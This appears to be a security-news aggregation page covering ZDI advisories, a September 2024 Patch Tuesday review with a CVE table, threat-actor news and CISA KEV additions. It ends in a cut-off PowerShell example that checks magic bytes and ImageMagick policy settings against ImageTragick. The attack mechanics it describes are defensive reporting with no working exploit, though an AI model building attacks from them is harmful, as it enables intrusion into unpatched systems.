ISC2’s annual report draws some troubling conclusions for the state of cyber defense. Budget cuts, layoffs and hiring freezes are exacerbating a global staffing shortage.

by Cybersecurity Dive

This vulnerability allows local attackers to escalate privileges on affected installations of Ivanti Workspace Control. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-8012.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-34785.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-34783.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-34779.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-32848.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-32846.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-32845.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-32843.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-32842.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-32840.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Ivanti Endpoint Manager. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.2. The following CVEs are assigned: CVE-2024-37397.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ivanti Endpoint Manager. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. Alternatively, no user interaction is required if the attacker has administrative credentials to the application. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-8191.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to bypass the SmartScreen security feature on affected installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2024-38213.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to bypass the SmartScreen security feature to execute arbitrary code on affected installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2024-38213.

by Zero Day Initiative Advisories

This vulnerability allows physically present attackers to execute arbitrary code on affected installations of Visteon Infotainment system. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.8. The following CVEs are assigned: CVE-2024-8355.

by Zero Day Initiative Advisories

The combination of immutability, indelibility, centralized governance, and user empowerment provides a comprehensive backup strategy, Google said.

by Dark Reading

Learn about Mitiga’s fully-managed cloud detection and response service that operates 24/7.

by Mitiga

Wiz Code identifies and flags cloud risks in code to help improve collaboration between security and development teams.

by Dark Reading

Microsoft Corp. today released updates to fix at least 79 security vulnerabilities in its Windows operating systems and related software, including multiple flaws that are already showing up in active attacks. Microsoft also corrected a critical bug that has caused some Windows 10 PCs to remain dangerously unpatched against actively exploited vulnerabilities for several months this year.

by Krebs on Security

The threat actor known as CosmicBeetle has debuted a new custom ransomware strain called ScRansom in attacks targeting small- and medium-sized businesses (SMBs) in Europe, Asia, Africa, and South America, while also likely working as an affiliate for RansomHub. "CosmicBeetle replaced its previously deployed ransomware, Scarab, with ScRansom, which is continually improved," ESET researcher Jakub

by The Hacker News

This month's Patch Tuesday contains a total of 79 vulnerabilities — the fourth largest of the year.

by Dark Reading

In this case study, a 180-year-old life and pension insurer brought its security infrastructure into the modern age.

by Dark Reading

AttackIQ has released a new assessment template in response to the CISA Advisory (AA24-249A) published on September 5, 2024, that assesses cyber actors affiliated with the Russian General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155), who are responsible for computer network operations against global targets for the purposes of espionage, sabotage, and reputational harm since at least 2020. The post Response to CISA Advisory (AA24-249A): Russian Military Cyber Actors Target US and Global Critical Infrastructure appeared first on AttackIQ.

by AttackIQ

A recent breach involved nearly 3 billion personal records and included many Social Security numbers. Was yours one of them? Here's how to check and what to do to protect yourself.

by ZDNET Security

September’s monthly round of patches from Microsoft included 79 vulnerabilities, seven of which are considered critical.

by Cisco Talos Blog

Traditional RAG links LLMs with enterprise data to enhance AI outcomes. Agentic RAG improves on this by employing intelligent agents to process complex queries across multiple sources.

by ITPro Today

How to make the most of the new features in Sophos Firewall v21

by Sophos News

Besides operational issues connected to a talent shortage, the cost of running security platforms — and their training costs — also keeps CISOs up at night.

by Dark Reading

The London transport authority removes a claim that said there was no evidence that customer data was compromised during a recent hack. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

We’ve reached September and the pumpkin spice floats in the air. While they aren’t pumpkin-spiced, Microsoft and Adobe have released their latest spicy security patches, including some zesty 0-days. Take a break from your regular activities and join us as we review the details of their latest security alerts. If you’d rather watch the full video recap covering the entire release, you can check it out here:

Adobe Patches for September 2024

For September, Adobe released eight bulletins covering 28 CVEs in Adobe Acrobat and Reader, ColdFusion, Photoshop, Media Encoder, Audition, After Effects, Premiere Pro, and Illustrator. A total of seven of these bugs came through the ZDI program. If you’re prioritizing, I would look at the ColdFusion patch first. It corrects a single code execution bug rated at CVSS 9.8. It’s unusual to see patches for Acrobat and Reader in back-to-back months, but I guess these two Critical-rated bugs were late for last month’s release. The fix for Photoshop addresses five CVEs, four of which are rated Critical. The Illustrator patch fixes six bugs, four of them Critical code execution bugs. The update for Premiere Pro fixes one Critical and one Moderate bug. The fix for After Effects covers five bugs, including two from ZDI researcher Mat Powell. He’s also responsible for the Critical-rated bug in Audition. The final patch from Adobe covers five bugs in Media Encoder, two of which are rated Critical.

None of the bugs fixed by Adobe this month are listed as publicly known or under active attack at the time of release. Adobe categorizes these updates as a deployment priority rating of 3.

Microsoft Patches for September 2024

This month, Microsoft released 79 new CVEs in Windows and Windows Components; Office and Office Components; Azure; Dynamics Business Central; SQL Server; Windows Hyper-V; Mark of the Web (MOTW); and the Remote Desktop Licensing Service. Four of these vulnerabilities were reported through the ZDI program.

Of the patches being released today, seven are rated Critical, 71 are rated Important, and one is rated Moderate in severity. The size of this release tracks with the volume we saw from Redmond last month, but again, it’s unusual to see such a high number of bugs under active attack.

One of these CVEs is listed as publicly known, and four others are listed as under active attack at the time of release. However, we at the ZDI think that number should be five. More on that later. Let’s take a closer look at some of the more interesting updates for this month, starting with the vulnerabilities currently being exploited:

CVE-2024-43491 - Microsoft Windows Update Remote Code Execution Vulnerability

This is an unusual bug. At first, it reads like a downgrade attack similar to the one discussed at Black Hat. However, it appears that this downgrade was introduced through updates to the Servicing Stack affecting Optional Components on Windows 10 systems. Admins will need to install both the servicing stack update (KB5043936) AND this security update (KB5043083) to fully address the vulnerability. It’s also interesting to note that while this particular bug isn’t being exploited in the wild, it allowed some of those Optional Components to be exploited. The only good news here is that only a portion of Windows 10 systems are affected. Check the write-up from Microsoft to see if you’re impacted, then test and deploy these updates quickly.

CVE-2024-38226 - Microsoft Publisher Security Features Bypass Vulnerability

I’m always amazed by the ingenuity of attackers, be they red teamers or threat actors. Who would have thought to exploit macros in Microsoft Publisher? I had forgotten all about that program. But here we are. The attack involves specially crafted files being opened by affected Publisher versions. Obviously, an attacker would need to convince a target to open the file, but if they do, it will bypass Office macro policies and execute code on the target system.

CVE-2024-38217 - Windows Mark of the Web Security Feature Bypass Vulnerability

We’ve talked a lot about MoTW bypasses over the last several months, but it seems like there’s always more to say. This is one of two MoTW bypasses receiving fixes this month, but only this one is listed as under attack. Microsoft provides no details about the attacks, but in the past, MoTW bypasses have been associated with ransomware gangs targeting crypto traders. This bug is also listed as publicly known, but no information is provided about that detail either.

CVE-2024-38014 - Windows Installer Elevation of Privilege Vulnerability

Here’s yet another privilege escalation bug that leads to SYSTEM being exploited in the wild. And not to conjure Xzibit memes, but I think it’s great when attackers put an extra installer in the Installer. Interestingly, Microsoft states that no user interaction is required for this bug, so the actual mechanics of the exploit may be odd. Still, privilege escalations like this are typically paired with a code execution bug to take over a system. Test and deploy this fix quickly.

CVE-2024-43461 - Windows MSHTML Platform Spoofing Vulnerability

This bug is similar to the vulnerability we reported that was patched back in July. The ZDI Threat Hunting team discovered this exploit in the wild and reported it to Microsoft back in June. It appears threat actors quickly bypassed the previous patch. When we told Microsoft about the bug, we indicated it was being actively used. We’re not sure why they don’t list it as being under active attack, but you should treat it as though it were, especially since it affects all supported versions of Windows.

Here’s the full list of CVEs released by Microsoft for September 2024:

CVE | Title | Severity | CVSS | Public | Exploited | XI | Type
CVE-2024-38217 | Windows Mark of the Web Security Feature Bypass Vulnerability | Important | 5.4 | Yes | Yes | 0 | SFB
CVE-2024-43491 † | Microsoft Windows Update Remote Code Execution Vulnerability | Critical | 9.8 | No | Yes | 0 | RCE
CVE-2024-38226 | Microsoft Publisher Security Features Bypass Vulnerability | Important | 7.3 | No | Yes | 0 | SFB
CVE-2024-38014 | Windows Installer Elevation of Privilege Vulnerability | Important | 7.8 | No | Yes | 0 | EoP
CVE-2024-43461 | Windows MSHTML Platform Spoofing Vulnerability | Important | 8.8 | No | Disputed | 1 | Spoofing
CVE-2024-38216 | Azure Stack Hub Elevation of Privilege Vulnerability | Critical | 8.2 | No | No | 2 | EoP
CVE-2024-38220 | Azure Stack Hub Elevation of Privilege Vulnerability | Critical | 9 | No | No | 2 | EoP
CVE-2024-38194 | Azure Web Apps Elevation of Privilege Vulnerability | Critical | 8.4 | No | No | 2 | EoP
CVE-2024-38018 | Microsoft SharePoint Server Remote Code Execution Vulnerability | Critical | 8.8 | No | No | 1 | RCE
CVE-2024-43464 | Microsoft SharePoint Server Remote Code Execution Vulnerability | Critical | 7.2 | No | No | 1 | RCE
CVE-2024-38119 | Windows Network Address Translation (NAT) Remote Code Execution Vulnerability | Critical | 7.5 | No | No | 2 | RCE
CVE-2024-43469 | Azure CycleCloud Remote Code Execution Vulnerability | Important | 8.8 | No | No | 2 | RCE
CVE-2024-38188 | Azure Network Watcher VM Agent Elevation of Privilege Vulnerability | Important | 7.1 | No | No | 2 | EoP
CVE-2024-43470 | Azure Network Watcher VM Agent Elevation of Privilege Vulnerability | Important | 7.3 | No | No | 2 | EoP
CVE-2024-38236 | DHCP Server Service Denial of Service Vulnerability | Important | 7.5 | No | No | 2 | DoS
CVE-2024-38238 | Kernel Streaming Service Driver Elevation of Privilege Vulnerability | Important | 7.8 | No | No | 1 | EoP
CVE-2024-38241 | Kernel Streaming Service Driver Elevation of Privilege Vulnerability | Important | 7.8 | No | No | 1 | EoP
CVE-2024-38242 | Kernel Streaming Service Driver Elevation of Privilege Vulnerability | Important | 7.8 | No | No | 1 | EoP
CVE-2024-38243 | Kernel Streaming Service Driver Elevation of Privilege Vulnerability | Important | 7.8 | No | No | 1 | EoP
CVE-2024-38244 | Kernel Streaming Service Driver Elevation of Privilege Vulnerability | Important | 7.8 | No | No | 1 | EoP
CVE-2024-38245 | Kernel Streaming Service Driver Elevation of Privilege Vulnerability | Important | 7.8 | No | No | 1 | EoP
CVE-2024-38237 | Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability | Important | 7.8 | No | No | 1 | EoP
CVE-2024-38257 | Microsoft AllJoyn API Information Disclosure Vulnerability | Important | 7.5 | No | No | 2 | Info
CVE-2024-43492 | Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability | Important | 7.8 | No | No | 2 | EoP
CVE-2024-43476 | Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability | Important | 7.6 | No | No | 2 | XSS
CVE-2024-38225 | Microsoft Dynamics 365 Business Central Elevation of Privilege Vulnerability | Important | 8.8 | No | No | 2 | EoP
CVE-2024-43465 | Microsoft Excel Elevation of Privilege Vulnerability | Important | 7.8 | No | No | 2 | EoP
CVE-2024-38259 | Microsoft Management Console Remote Code Execution Vulnerability | Important | 8.8 | No | No | 2 | RCE
CVE-2024-43463 | Microsoft Office Visio Remote Code Execution Vulnerability | Important | 7.8 | No | No | 2 | RCE
CVE-2024-43482 † | Microsoft Outlook for iOS Information Disclosure Vulnerability | Important | 6.5 | No | No | 2 | Info
CVE-2024-43479 † | Microsoft Power Automate Desktop Remote Code Execution Vulnerability | Important | 8.5 | No | No | 2 | RCE
CVE-2024-43466 | Microsoft SharePoint Server Denial of Service Vulnerability | Important | 6.5 | No | No | 2 | DoS
CVE-2024-38227 | Microsoft SharePoint Server Remote Code Execution Vulnerability | Important | 7.2 | No | No | 1 | RCE
CVE-2024-38228 | Microsoft SharePoint Server Remote Code Execution Vulnerability | Important | 7.2 | No | No | 1 | RCE
CVE-2024-37341 † | Microsoft SQL Server Elevation of Privilege Vulnerability | Important | 8.8 | No | No | 2 | EoP
CVE-2024-37965 † | Microsoft SQL Server Elevation of Privilege Vulnerability | Important | 8.8 | No | No | 2 | EoP
CVE-2024-37980 † | Microsoft SQL Server Elevation of Privilege Vulnerability | Important | 8.8 | No | No | 2 | EoP
CVE-2024-43474 | Microsoft SQL Server Information Disclosure Vulnerability | Important | 7.6 | No | No | 2 | Info
CVE-2024-37337 | Microsoft SQL Server Native Scoring Information Disclosure Vulnerability | Important | 7.1 | No | No | 2 | Info
CVE-2024-37342 | Microsoft SQL Server Native Scoring Information Disclosure Vulnerability | Important | 7.1 | No | No | 2 | Info
CVE-2024-37966 | Microsoft SQL Server Native Scoring Information Disclosure Vulnerability | Important | 7.1 | No | No | 2 | Info
CVE-2024-26186 † | Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability | Important | 8.8 | No | No | 2 | RCE
CVE-2024-26191 † | Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability | Important | 8.8 | No | No | 2 | RCE
CVE-2024-37335 † | Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability | Important | 8.8 | No | No | 2 | RCE
CVE-2024-37338 † | Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability | Important | 8.8 | No | No | 2 | RCE
CVE-2024-37339 † | Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability | Important | 8.8 | No | No | 2 | RCE
CVE-2024-37340 † | Microsoft SQL Server Native Scoring Remote Code Execution Vulnerability | Important | 8.8 | No | No | 2 | RCE
CVE-2024-43475 | Microsoft Windows Admin Center Information Disclosure Vulnerability | Important | 7.3 | No | No | 2 | Info
CVE-2024-38046 | PowerShell Elevation of Privilege Vulnerability | Important | 7.8 | No | No | 2 | EoP
CVE-2024-38246 | Win32k Elevation of Privilege Vulnerability | Important | 7 | No | No | 1 | EoP
CVE-2024-38254 | Windows Authentication Information Disclosure Vulnerability | Important | 5.5 | No | No | 2 | Info
CVE-2024-38247 | Windows Graphics Component Elevation of Privilege Vulnerability | Important | 7.8 | No | No | 1 | EoP
CVE-2024-38249 | Windows Graphics Component Elevation of Privilege Vulnerability | Important | 7.8 | No | No | 1 | EoP
CVE-2024-38250 | Windows Graphics Component Elevation of Privilege Vulnerability | Important | 7.8 | No | No | 2 | EoP
CVE-2024-38235 | Windows Hyper-V Denial of Service Vulnerability | Important | 6.5 | No | No | 2 | DoS
CVE-2024-38239 | Windows Kerberos Elevation of Privilege Vulnerability | Important | 7.2 | No | No | 2 | EoP
CVE-2024-38256 | Windows Kernel-Mode Driver Information Disclosure Vulnerability | Important | 5.5 | No | No | 2 | Info
CVE-2024-43495 | Windows libarchive Remote Code Execution Vulnerability | Important | 7.3 | No | No | 2 | RCE
CVE-2024-38232 | Windows Networking Denial of Service Vulnerability | Important | 7.5 | No | No | 2 | DoS
CVE-2024-38233 | Windows Networking Denial of Service Vulnerability | Important | 7.5 | No | No | 2 | DoS
CVE-2024-38234 | Windows Networking Denial of Service Vulnerability | Important | 6.5 | No | No | 2 | DoS
CVE-2024-43458 | Windows Networking Information Disclosure Vulnerability | Important | 7.7 | No | No | 2 | Info
CVE-2024-38240 | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | Important | 8.1 | No | No | 2 | EoP
CVE-2024-38231 | Windows Remote Desktop Licensing Service Denial of Service Vulnerability | Important | 6.5 | No | No | 2 | DoS
CVE-2024-38258 | Windows Remote Desktop Licensing Service Information Disclosure Vulnerability | Important | 6.5 | No | No | 2 | Info
CVE-2024-38260 | Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability | Important | 8.8 | No | No | 2 | RCE
CVE-2024-38263 | Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability | Important | 7.5 | No | No | 2 | RCE
CVE-2024-43454 | Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability | Important | 7.1 | No | No | 2 | RCE
CVE-2024-43467 | Windows Remote Desktop Licensing Service Remote Code Execution Vulnerability | Important | 7.5 | No | No | 2 | RCE
CVE-2024-43455 | Windows Remote Desktop Licensing Service Spoofing Vulnerability | Important | 8.8 | No | No | 2 | Spoofing
CVE-2024-30073 | Windows Security Zone Mapping Security Feature Bypass Vulnerability | Important | 7.8 | No | No | 2 | SFB
CVE-2024-43457 | Windows Setup and Deployment Elevation of Privilege Vulnerability | Important | 7.8 | No | No | 1 | EoP
CVE-2024-38230 | Windows Standards-Based Storage Management Service Denial of Service Vulnerability | Important | 6.5 | No | No | 2 | DoS
CVE-2024-38248 | Windows Storage Elevation of Privilege Vulnerability | Important | 7 | No | No | 2 | EoP
CVE-2024-21416 | Windows TCP/IP Remote Code Execution Vulnerability | Important | 8.1 | No | No | 2 | RCE
CVE-2024-38045 | Windows TCP/IP Remote Code Execution Vulnerability | Important | 8.1 | No | No | 2 | RCE
CVE-2024-38252 | Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability | Important | 7.8 | No | No | 1 | EoP
CVE-2024-38253 | Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability | Important | 7.8 | No | No | 1 | EoP
CVE-2024-43487 | Windows Mark of the Web Security Feature Bypass Vulnerability | Moderate | 6.5 | No | No | 1 | SFB

† Indicates further administrative actions are required to fully address the vulnerability.

Moving on to the other Critical-rated bugs, the vulnerability in SharePoint stands out. It was discovered by ZDI researcher Piotr Bazydło and could lead to code execution in the context of the service account. The specific flaw exists within the handling of serialized instances of the SPThemes class. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. There’s another Critical fix for SharePoint, but it requires Site Owner permissions. There are two bugs in Azure Stack Hub that could allow an attacker to interact with other tenants’ applications and content. However, the threat actor would need the target to initiate a connection. There’s a bug in NAT that would allow unauthenticated code execution, but the attacker would need access to a restricted network first since NAT isn’t routable (in most cases). The final Critical bug has already been mitigated by Microsoft and is being publicly documented.

Looking at the other code execution bugs, the two in TCP/IP stand out, especially considering the ugly bug in TCP fixed last month. However, these bugs require a non-default configuration, so they are less likely to have a big impact. For enterprises configured with NetNAT, test and deploy this update quickly. There are four code execution bugs in the Remote Desktop Licensing Service, but all require authentication. There are six fixes for SQL Server Native Scoring, and the exploit scenario here is interesting. According to Microsoft, exploitation “requires an authenticated attacker to leverage SQL Server Native Scoring to apply pre-trained models to their data without moving it out of the database.” The servicing scenario is also convoluted, as you may need to contact third-party vendors to verify apps are compatible with Microsoft OLE DB Driver 18 or 19. Read the bulletin, scratch your head, then read it again. Bugs like this one make me unreasonably angry when people say, “Just Patch.” The bug in Azure CycleCloud almost reads like a privilege escalation, as a basic user could make specially crafted requests to modify the configuration of an Azure CycleCloud cluster to gain root-level permissions. There are two other fixes for SharePoint, but they are listed as Important instead of Critical for some reason, despite looking suspiciously similar to the Critical-rated bugs. The fix for Power Automate Desktop is found in the Windows Store, so if you have disabled Store updates, you’ll need to apply this fix manually. The remaining RCE bugs are garden-variety open-and-own vulnerabilities.

There are 30 fixes for Elevation of Privilege (EoP) bugs in this release, including those already mentioned. Most of these lead either to SYSTEM-level code execution or to administrative privileges if an authenticated user runs specially crafted code. The bugs in SQL Server will have the same servicing problems as previously mentioned. Bottom line: it’s a bad month to be an SQL Server admin. The bug in PowerShell could allow a regular user to elevate to an unrestrained WDAC user.

Beyond those already mentioned, there are two Security Feature Bypass (SFB) bugs receiving patches this month. Both involve web browsing. The first is in Windows Security Zone Mapping and could allow an attacker to craft a URL that would be interpreted as belonging to a more privileged zone. The other is another MoTW SmartScreen bypass. This one is not listed as public, but the technique is quite in vogue right now.

The September release includes fixes for 11 different information disclosure bugs. Thankfully, most only result in info leaks consisting of unspecified memory contents. There are two exceptions. The bug in Remote Desktop Licensing Service could disclose the ever-ethereal “sensitive information”. The bug in Outlook for iOS would allow attackers to read “file content.” It’s not clear if that’s random file content or if the files can be specified by the attacker. Also, you’ll need to get this update from the App Store if you haven’t enabled automatic updates on your iOS device.

In addition to the spoofing bug under active attack, there’s also a fix for a spoofing bug in the Windows Remote Desktop Licensing Service. Microsoft doesn’t specify what is being spoofed; only that an attacker must be able to send requests to the Terminal Server Licensing Service. This shouldn’t be reachable from the Internet, but now would be a fine time to verify that fact.

The September release includes fixes for a handful of Denial-of-Service (DoS) bugs. However, Microsoft again provides little additional information about these vulnerabilities. There are some things we can see in the tea leaves. For example, one of the patches for Windows Networking notes that an unauthenticated attacker with LAN access can exploit this bug. However, the other patches for Windows Networking list the attack vector as Network instead of Adjacent. I would still think the attacker would be unauthenticated. The DoS in the DHCP server would likely shut down the service, but again, it’s not clear if that’s a permanent or a temporary DoS. We do know the DoS in Hyper-V would allow an attacker on a guest OS to impact the functionality of the host OS.

Finally, the release is rounded out by a single cross-site scripting (XSS) bug in Microsoft Dynamics (on-premises).

There are no new advisories in this month’s release.

Looking Ahead

The next Patch Tuesday of 2024 will be on October 8, and I’ll return with details and spooky patch analysis then. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!

by Zero Day Initiative Blog

A trio of threat activity clusters linked to China has been observed compromising more government organizations in Southeast Asia as part of a renewed state-sponsored operation codenamed Crimson Palace, indicating an expansion in the scope of the espionage effort. Cybersecurity firm Sophos, which has been monitoring the cyber offensive, said it comprises three intrusion sets tracked as Cluster

by The Hacker News

Shadow apps, a segment of Shadow IT, are SaaS applications purchased without the knowledge of the security team. While these applications may be legitimate, they operate within the blind spots of the corporate security team and expose the company to attackers.  Shadow apps may include instances of software that the company is already using. For example, a dev team may onboard their own

by The Hacker News

A subscription for Windows 10 Extended Security Updates will be shockingly expensive for businesses. For educators, the cost is just a few bucks. But what about consumers?

by ZDNET Security

2024-09-10 15:47:13

SiegeCast: Be Your Enemy

Collaboration between offensive (Red Team) and defensive (Blue Team) operations is essential to fortify an organization’s defenses. During a recent SiegeCast session, Tim Medin (CEO of Red Siege), Justin Polk […]

by Red Siege Blog

A new side-channel attack dubbed PIXHELL could be abused to target air-gapped computers by breaching the "audio gap" and exfiltrating sensitive information by taking advantage of the noise generated by pixels on an LCD screen. "Malware in the air-gap and audio-gap computers generates crafted pixel patterns that produce noise in the frequency range of 0 - 22 kHz," Dr. Mordechai Guri, the head of

by The Hacker News

A fresh wave of attacks on APAC government entities involves both self-propagating malware spreading via removable drives and a spear-phishing campaign.

by Dark Reading

The threat actor tracked as Mustang Panda has refined its malware arsenal to include new tools in order to facilitate data exfiltration and the deployment of next-stage payloads, according to new findings from Trend Micro. The cybersecurity firm, which is monitoring the activity cluster under the name Earth Preta, said it observed "the propagation of PUBLOAD via a variant of the worm HIUPAN."

by The Hacker News

Key Takeaways

- CISA has updated its Known Exploited Vulnerabilities (KEV) Catalog with three critical vulnerabilities: CVE-2016-3714, CVE-2017-1000253, and CVE-2024-40766.
- These vulnerabilities are being actively exploited by cybercriminals, posing significant risks to both federal and private sector organizations.
- CISA urges all organizations to prioritize the remediation of these vulnerabilities to strengthen their cybersecurity defenses.
- Organizations should update software with the latest patches, implement multi-factor authentication (MFA), and continuously monitor for unusual activities.
- For detailed information and support, organizations should consult CISA’s advisories and the relevant vendor resources.

Overview

The Cybersecurity and Infrastructure Security Agency (CISA) has recently updated its Known Exploited Vulnerabilities (KEV) Catalog by adding three new vulnerabilities. These newly identified flaws represent significant security risks and are actively being exploited by malicious actors. The newly added vulnerabilities include CVE-2016-3714, which affects ImageMagick due to improper input validation; CVE-2017-1000253, a Linux kernel vulnerability involving stack buffer corruption in position-independent executables (PIE); and CVE-2024-40766, a severe access control issue in SonicWall SonicOS. These vulnerabilities are known to be frequent targets for cyberattacks and present significant risks to both federal and private sector organizations. CISA urges all organizations to prioritize remediation of these vulnerabilities to enhance their cybersecurity posture.

Details of the Vulnerabilities

CVE-2016-3714, also known as "ImageTragick," affects ImageMagick versions prior to 6.9.3-10 and 7.x before 7.0.1-1. This vulnerability arises from improper input validation, which impacts various coders within ImageMagick. Exploiting this flaw allows attackers to execute arbitrary code via shell metacharacters in a specially crafted image, potentially leading to remote code execution. To mitigate this risk, users should ensure that image files are validated for correct "magic bytes" and configure ImageMagick’s policy file to disable the vulnerable coders. Comprehensive guidance on configuration and additional mitigations is available for users.

CVE-2017-1000253 affects multiple versions of the Linux kernel, including those used in Red Hat Enterprise Linux and CentOS. This vulnerability involves stack buffer corruption in the load_elf_binary() function, which can be exploited by local attackers to escalate privileges through issues with position-independent executables (PIE). Users are advised to apply the available patches to correct this buffer corruption flaw. Further details and patches are provided for addressing this issue.

CVE-2024-40766 is a critical vulnerability affecting SonicWall Firewalls Gen 5, Gen 6, and Gen 7 devices running SonicOS 7.0.1-5035 and older. This flaw in SonicWall SonicOS Management Access and SSLVPN allows unauthenticated attackers to gain unauthorized access to the management interface, which could result in unauthorized resource access or even firewall crashes. To mitigate this vulnerability, it is essential to restrict firewall management to trusted sources or disable WAN management and SSLVPN access from the Internet. Users should download and apply the latest patches from SonicWall’s official site, and detailed security measures and patch links are available for further guidance.

Conclusion

The addition of CVE-2016-3714, CVE-2017-1000253, and CVE-2024-40766 to CISA’s KEV Catalog highlights the critical nature of these vulnerabilities. Organizations must act promptly to address these issues by applying patches and implementing recommended security practices. For additional information and support, refer to the official advisories and technical resources provided by CISA and relevant vendors.

Mitigation and Recommendations

- Ensure all software, firmware, and systems are updated with the latest patches.
- Restrict access to critical systems to authorized users only and implement multi-factor authentication (MFA).
- Continuously monitor systems for unusual activities and conduct regular security audits and vulnerability assessments.
- Maintain and regularly update an incident response plan to manage potential security breaches effectively.
- Develop a comprehensive strategy for patch management, including inventory, assessment, testing, and deployment.
- Implement proper network segmentation to protect critical assets from internet exposure.

The post CISA Adds Three Critical Vulnerabilities to Known Exploited Vulnerabilities Catalog appeared first on Cyble.

by CYBLE
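The Cyble post above names the two ImageTragick mitigations (validate magic bytes; disable the vulnerable coders in policy.xml) without showing either. The following is an added example written for this page, not code from Cyble or from the ImageMagick project. It assumes PowerShell 5.1 or later; the coder list is the one the 2016 ImageTragick advisory recommended disabling, the policy fragment is a constructed sample that deliberately omits two of them, and the "image" is a constructed MVG payload saved under a .png name.

```powershell
# Added example (editor's code, not from the Cyble post or ImageMagick): the two
# CVE-2016-3714 mitigations as checks to run before a file reaches ImageMagick.

# Magic bytes for the formats we are willing to accept. ImageTragick worked because
# ImageMagick sniffed the content (an MVG/SVG body starting "push graphic-context")
# regardless of the claimed extension, so the claimed type must be confirmed from bytes.
$magic = @{
    '.png'  = @(0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A)
    '.jpg'  = @(0xFF, 0xD8, 0xFF)
    '.jpeg' = @(0xFF, 0xD8, 0xFF)
    '.gif'  = @(0x47, 0x49, 0x46, 0x38)   # "GIF8"
}

function Test-ImageMagic {
    # $true only when the file's leading bytes match the type its extension claims.
    param([Parameter(Mandatory)][string]$Path)
    $ext = [System.IO.Path]::GetExtension($Path).ToLowerInvariant()
    if (-not $magic.ContainsKey($ext)) { return $false }   # unknown type: reject
    $expected = $magic[$ext]
    $fs = [System.IO.File]::OpenRead($Path)
    try {
        $buf  = New-Object byte[] ($expected.Count)
        $read = $fs.Read($buf, 0, $buf.Length)
    } finally { $fs.Dispose() }
    if ($read -lt $expected.Count) { return $false }
    for ($i = 0; $i -lt $expected.Count; $i++) {
        if ($buf[$i] -ne $expected[$i]) { return $false }
    }
    return $true
}

# Coders the ImageTragick advisory recommended disabling in policy.xml.
$dangerousCoders = 'EPHEMERAL', 'URL', 'HTTPS', 'MVG', 'MSL', 'TEXT', 'SHOW', 'WIN', 'PLT'

function Test-ImageMagickPolicy {
    # Returns the coders from $dangerousCoders that the given policy does NOT disable.
    param([Parameter(Mandatory)][string]$PolicyXml)
    $doc = [xml]$PolicyXml
    $disabled = $doc.policymap.policy |
        Where-Object { $_.domain -eq 'coder' -and $_.rights -eq 'none' } |
        ForEach-Object { $_.pattern }
    $dangerousCoders | Where-Object { $disabled -notcontains $_ }
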